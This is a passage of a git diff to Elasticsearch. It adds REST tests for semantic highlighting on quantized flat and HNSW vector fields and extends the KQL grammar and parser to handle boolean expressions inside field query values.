"doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." 
} + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } --- "semantic highlighter ignores non-inference fields": @@ -306,8 +323,8 @@ setup: type: semantic number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - not_exists: hits.hits.0.highlight.title --- @@ -333,7 +350,7 @@ setup: index: test-multi-chunk-index id: doc_1 body: - semantic_text_field: ["some test data", " ", "now with chunks"] + semantic_text_field: [ "some test data", " ", "now with chunks" ] refresh: true - do: @@ -367,25 +384,25 @@ setup: index: test-sparse-index body: query: - match_all: {} + match_all: { } highlight: fields: body: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: body: @@ -432,18 +449,18 @@ setup: index: test-index-sparse body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.semantic_text_field: 2 } - - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } + - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } + - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } - do: indices.create: @@ -473,7 +490,7 @@ setup: index: test-index-dense body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: @@ -485,3 +502,172 @@ setup: - length: { hits.hits.0.highlight.semantic_text_field: 2 } - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } + +--- +"Highlighting with flat quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-flat + body: + settings: + index.mapping.semantic_text.use_legacy_format: false + mappings: + properties: + flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: flat + int4_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_flat + int8_flat_field: + type: 
semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_flat + bbq_flat_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_flat + + + - do: + index: + index: test-dense-index-flat + id: doc_1 + body: + flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true + + - do: + search: + index: test-dense-index-flat + body: + query: + match_all: { } + highlight: + fields: + flat_field: + type: "semantic" + number_of_fragments: 1 + int4_flat_field: + type: "semantic" + number_of_fragments: 1 + int8_flat_field: + type: "semantic" + number_of_fragments: 1 + bbq_flat_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.flat_field: 1 } + - match: { hits.hits.0.highlight.flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_flat_field: 1 } + - match: { hits.hits.0.highlight.int4_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_flat_field: 1 } + - match: { hits.hits.0.highlight.int8_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_flat_field: 1 } + - match: { hits.hits.0.highlight.bbq_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." 
} + +--- +"Highlighting with HNSW quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-hnsw + body: + settings: + index.mapping.semantic_text.use_legacy_format: false + mappings: + properties: + hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: hnsw + int4_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_hnsw + int8_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_hnsw + bbq_hnsw_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_hnsw + + + - do: + index: + index: test-dense-index-hnsw + id: doc_1 + body: + hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true + + - do: + search: + index: test-dense-index-hnsw + body: + query: + match_all: { } + highlight: + fields: + hnsw_field: + type: "semantic" + number_of_fragments: 1 + int4_hnsw_field: + type: "semantic" + number_of_fragments: 1 + int8_hnsw_field: + type: "semantic" + number_of_fragments: 1 + bbq_hnsw_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.hnsw_field: 1 } + - match: { hits.hits.0.highlight.hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int4_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int8_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_hnsw_field: 1 } + - match: { hits.hits.0.highlight.bbq_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." 
} + diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml index 1e874d60a016c..4675977842973 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/90_semantic_text_highlighter_bwc.yml @@ -35,6 +35,23 @@ setup: } } + - do: + inference.put: + task_type: text_embedding + inference_id: dense-inference-id-compatible-with-bbq + body: > + { + "service": "text_embedding_test_service", + "service_settings": { + "model": "my_model", + "dimensions": 64, + "similarity": "cosine", + "api_key": "abc64" + }, + "task_settings": { + } + } + - do: indices.create: index: test-sparse-index @@ -65,12 +82,12 @@ setup: --- "Highlighting empty field": - do: - index: - index: test-dense-index - id: doc_1 - body: - body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] - refresh: true + index: + index: test-dense-index + id: doc_1 + body: + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + refresh: true - match: { result: created } @@ -79,14 +96,14 @@ setup: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: - another_body: {} + another_body: { } - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } - - not_exists: hits.hits.0.highlight.another_body + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - not_exists: hits.hits.0.highlight.another_body --- "Highlighting using a sparse embedding model": @@ -95,7 +112,7 @@ setup: index: test-sparse-index id: doc_1 body: - body: ["ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!"] + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] refresh: true - match: { result: created } @@ -114,10 +131,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." 
} - do: search: @@ -133,11 +150,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } - do: search: @@ -154,10 +171,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - do: search: @@ -187,7 +204,7 @@ setup: index: test-dense-index id: doc_1 body: - body: ["ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!"] + body: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] refresh: true - match: { result: created } @@ -206,10 +223,10 @@ setup: type: "semantic" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -225,11 +242,11 @@ setup: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" 
} - do: search: @@ -246,10 +263,10 @@ setup: order: "score" number_of_fragments: 1 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 1 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - do: search: @@ -266,11 +283,11 @@ setup: order: "score" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } - - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.0: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.1: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } --- "Highlighting and multi chunks with empty input": @@ -295,7 +312,7 @@ setup: index: test-multi-chunk-index id: doc_1 body: - semantic_text_field: ["some test data", " ", "now with chunks"] + semantic_text_field: [ "some test data", " ", "now with chunks" ] refresh: true - do: @@ -337,18 +354,18 @@ setup: index: test-sparse-index body: query: - match_all: {} + match_all: { } highlight: fields: body: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.body: 2 } - - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } - - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" } + - match: { hits.hits.0.highlight.body.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - match: { hits.hits.0.highlight.body.1: "You Know, for Search!" 
} - do: index: @@ -363,7 +380,7 @@ setup: index: test-dense-index body: query: - match_all: {} + match_all: { } highlight: fields: body: @@ -410,18 +427,18 @@ setup: index: test-index-sparse body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: type: "semantic" number_of_fragments: 2 - - match: { hits.total.value: 1 } - - match: { hits.hits.0._id: "doc_1" } + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } - length: { hits.hits.0.highlight.semantic_text_field: 2 } - - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } + - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } + - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } - do: indices.create: @@ -451,7 +468,7 @@ setup: index: test-index-dense body: query: - match_all: {} + match_all: { } highlight: fields: semantic_text_field: @@ -464,3 +481,173 @@ setup: - match: { hits.hits.0.highlight.semantic_text_field.0: "some test data" } - match: { hits.hits.0.highlight.semantic_text_field.1: "now with chunks" } +--- +"Highlighting with flat quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-flat + body: + settings: + index.mapping.semantic_text.use_legacy_format: true + mappings: + properties: + flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: flat + int4_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_flat + int8_flat_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_flat + bbq_flat_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_flat + + + - do: + index: + index: test-dense-index-flat + id: doc_1 + body: + flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_flat_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" 
] + refresh: true + + - do: + search: + index: test-dense-index-flat + body: + query: + match_all: { } + highlight: + fields: + flat_field: + type: "semantic" + number_of_fragments: 1 + int4_flat_field: + type: "semantic" + number_of_fragments: 1 + int8_flat_field: + type: "semantic" + number_of_fragments: 1 + bbq_flat_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.flat_field: 1 } + - match: { hits.hits.0.highlight.flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_flat_field: 1 } + - match: { hits.hits.0.highlight.int4_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_flat_field: 1 } + - match: { hits.hits.0.highlight.int8_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_flat_field: 1 } + - match: { hits.hits.0.highlight.bbq_flat_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + +--- +"Highlighting with HNSW quantization index options": + - requires: + cluster_features: "semantic_text.highlighter.flat_index_options" + reason: semantic highlighter fix for flat index options + + - do: + indices.create: + index: test-dense-index-hnsw + body: + settings: + index.mapping.semantic_text.use_legacy_format: true + mappings: + properties: + hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: hnsw + int4_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int4_hnsw + int8_hnsw_field: + type: semantic_text + inference_id: dense-inference-id + index_options: + dense_vector: + type: int8_hnsw + bbq_hnsw_field: + type: semantic_text + inference_id: dense-inference-id-compatible-with-bbq + index_options: + dense_vector: + type: bbq_hnsw + + + - do: + index: + index: test-dense-index-hnsw + id: doc_1 + body: + hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int4_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + int8_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" ] + bbq_hnsw_field: [ "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides.", "You Know, for Search!" 
] + refresh: true + + - do: + search: + index: test-dense-index-hnsw + body: + query: + match_all: { } + highlight: + fields: + hnsw_field: + type: "semantic" + number_of_fragments: 1 + int4_hnsw_field: + type: "semantic" + number_of_fragments: 1 + int8_hnsw_field: + type: "semantic" + number_of_fragments: 1 + bbq_hnsw_field: + type: "semantic" + number_of_fragments: 1 + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - length: { hits.hits.0.highlight: 4 } + - length: { hits.hits.0.highlight.hnsw_field: 1 } + - match: { hits.hits.0.highlight.hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int4_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int4_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.int8_hnsw_field: 1 } + - match: { hits.hits.0.highlight.int8_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + - length: { hits.hits.0.highlight.bbq_hnsw_field: 1 } + - match: { hits.hits.0.highlight.bbq_hnsw_field.0: "ElasticSearch is an open source, distributed, RESTful, search engine which is built on top of Lucene internally and enjoys all the features it provides." } + + + diff --git a/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 b/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 index 739fa5eb0c6eb..a11132d6bbc61 100644 --- a/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 +++ b/x-pack/plugin/kql/src/main/antlr/KqlBase.g4 @@ -27,7 +27,7 @@ topLevelQuery query : query operator=(AND|OR) query #booleanQuery - | simpleQuery #defaultQuery + | simpleQuery #defaultQuery ; simpleQuery @@ -51,7 +51,7 @@ nestedQuery nestedSubQuery : nestedSubQuery operator=(AND|OR) nestedSubQuery #booleanNestedQuery - | nestedSimpleSubQuery #defaultNestedQuery + | nestedSimpleSubQuery #defaultNestedQuery ; nestedSimpleSubQuery @@ -89,21 +89,27 @@ existsQuery fieldQuery : fieldName COLON fieldQueryValue - | fieldName COLON LEFT_PARENTHESIS fieldQueryValue RIGHT_PARENTHESIS ; fieldLessQuery : fieldQueryValue - | LEFT_PARENTHESIS fieldQueryValue RIGHT_PARENTHESIS ; fieldQueryValue - : (AND|OR|NOT)? (UNQUOTED_LITERAL|WILDCARD)+ (NOT|AND|OR)? - | (AND|OR) (AND|OR|NOT)? - | NOT (AND|OR)? + : (UNQUOTED_LITERAL|WILDCARD)+ + | (UNQUOTED_LITERAL|WILDCARD)? (OR|AND|NOT)+ + | (AND|OR)+ (UNQUOTED_LITERAL|WILDCARD)? | QUOTED_STRING + | operator=NOT (fieldQueryValue)? 
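// illustrative examples (assumed from the rules above and below, not taken from the patch or its tests):
// field:NOT foo, field:(foo OR bar), and field:((foo OR bar) AND baz) all parse as a single
// field name applied to a negated or parenthesized boolean value expression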
+ | LEFT_PARENTHESIS booleanFieldQueryValue RIGHT_PARENTHESIS ; +booleanFieldQueryValue + : booleanFieldQueryValue operator=(AND|OR) fieldQueryValue + | LEFT_PARENTHESIS booleanFieldQueryValue RIGHT_PARENTHESIS + | fieldQueryValue + ; + fieldName : value=UNQUOTED_LITERAL | value=QUOTED_STRING diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java index 2d810a33190ca..b26ac401a0746 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlAstBuilder.java @@ -25,6 +25,7 @@ import java.util.Set; import java.util.function.BiConsumer; import java.util.function.BiFunction; +import java.util.function.Consumer; import static org.elasticsearch.common.logging.LoggerMessageFormat.format; import static org.elasticsearch.xpack.kql.parser.KqlParsingContext.isDateField; @@ -207,38 +208,76 @@ public QueryBuilder visitFieldLessQuery(KqlBaseParser.FieldLessQueryContext ctx) @Override public QueryBuilder visitFieldQuery(KqlBaseParser.FieldQueryContext ctx) { + return parseFieldQuery(ctx.fieldName(), ctx.fieldQueryValue()); + } - BoolQueryBuilder boolQueryBuilder = QueryBuilders.boolQuery().minimumShouldMatch(1); - String queryText = extractText(ctx.fieldQueryValue()); - boolean hasWildcard = hasWildcard(ctx.fieldQueryValue()); + public QueryBuilder parseBooleanFieldQuery( + KqlBaseParser.FieldNameContext fieldNameCtx, + KqlBaseParser.BooleanFieldQueryValueContext booleanFieldQueryValueCtx + ) { + if (booleanFieldQueryValueCtx.operator != null) { + BoolQueryBuilder boolQueryBuilder = QueryBuilders.boolQuery(); + + Token operator = booleanFieldQueryValueCtx.operator; + Consumer<QueryBuilder> boolClauseConsumer = operator.getType() == KqlBaseParser.AND + ? boolQueryBuilder::must + : boolQueryBuilder::should; + boolClauseConsumer.accept(parseBooleanFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.booleanFieldQueryValue())); + boolClauseConsumer.accept(parseFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.fieldQueryValue())); + + return operator.getType() == KqlBaseParser.AND + ?
rewriteConjunctionQuery(boolQueryBuilder) + : rewriteDisjunctionQuery(boolQueryBuilder); + } else if (booleanFieldQueryValueCtx.booleanFieldQueryValue() != null) { + return parseBooleanFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.booleanFieldQueryValue()); + } else { + assert booleanFieldQueryValueCtx.fieldQueryValue() != null; + return parseFieldQuery(fieldNameCtx, booleanFieldQueryValueCtx.fieldQueryValue()); + } + } - withFields(ctx.fieldName(), (fieldName, mappedFieldType) -> { - QueryBuilder fieldQuery = null; - - if (hasWildcard && isKeywordField(mappedFieldType)) { - fieldQuery = QueryBuilders.wildcardQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); - } else if (hasWildcard) { - fieldQuery = QueryBuilders.queryStringQuery(escapeLuceneQueryString(queryText, true)).field(fieldName); - } else if (isDateField(mappedFieldType)) { - RangeQueryBuilder rangeFieldQuery = QueryBuilders.rangeQuery(fieldName).gte(queryText).lte(queryText); - if (kqlParsingContext.timeZone() != null) { - rangeFieldQuery.timeZone(kqlParsingContext.timeZone().getId()); + public QueryBuilder parseFieldQuery( + KqlBaseParser.FieldNameContext fieldNameCtx, + KqlBaseParser.FieldQueryValueContext fieldQueryValueCtx + ) { + if (fieldQueryValueCtx.operator != null) { + assert fieldQueryValueCtx.fieldQueryValue() != null; + return QueryBuilders.boolQuery().mustNot(parseFieldQuery(fieldNameCtx, fieldQueryValueCtx.fieldQueryValue())); + } else if (fieldQueryValueCtx.booleanFieldQueryValue() != null) { + return parseBooleanFieldQuery(fieldNameCtx, fieldQueryValueCtx.booleanFieldQueryValue()); + } else { + BoolQueryBuilder boolQueryBuilder = QueryBuilders.boolQuery(); + String queryText = extractText(fieldQueryValueCtx); + boolean hasWildcard = hasWildcard(fieldQueryValueCtx); + + withFields(fieldNameCtx, (fieldName, mappedFieldType) -> { + QueryBuilder fieldQuery; + + if (hasWildcard && isKeywordField(mappedFieldType)) { + fieldQuery = QueryBuilders.wildcardQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); + } else if (hasWildcard) { + fieldQuery = QueryBuilders.queryStringQuery(escapeLuceneQueryString(queryText, true)).field(fieldName); + } else if (isDateField(mappedFieldType)) { + RangeQueryBuilder rangeFieldQuery = QueryBuilders.rangeQuery(fieldName).gte(queryText).lte(queryText); + if (kqlParsingContext.timeZone() != null) { + rangeFieldQuery.timeZone(kqlParsingContext.timeZone().getId()); + } + fieldQuery = rangeFieldQuery; + } else if (isKeywordField(mappedFieldType)) { + fieldQuery = QueryBuilders.termQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); + } else if (fieldQueryValueCtx.QUOTED_STRING() != null) { + fieldQuery = QueryBuilders.matchPhraseQuery(fieldName, queryText); + } else { + fieldQuery = QueryBuilders.matchQuery(fieldName, queryText); } - fieldQuery = rangeFieldQuery; - } else if (isKeywordField(mappedFieldType)) { - fieldQuery = QueryBuilders.termQuery(fieldName, queryText).caseInsensitive(kqlParsingContext.caseInsensitive()); - } else if (ctx.fieldQueryValue().QUOTED_STRING() != null) { - fieldQuery = QueryBuilders.matchPhraseQuery(fieldName, queryText); - } else { - fieldQuery = QueryBuilders.matchQuery(fieldName, queryText); - } - if (fieldQuery != null) { - boolQueryBuilder.should(wrapWithNestedQuery(fieldName, fieldQuery)); - } - }); + if (fieldQuery != null) { + boolQueryBuilder.should(wrapWithNestedQuery(fieldName, fieldQuery)); + } + }); - return rewriteDisjunctionQuery(boolQueryBuilder); + 
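// illustrative note (comment only): at this point a plain value has contributed one should clause
// per field matched by withFields, i.e. a disjunction across the target fields; boolean values were
// handled above, with AND mapped to must and OR to should (parseBooleanFieldQuery), and NOT to mustNot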
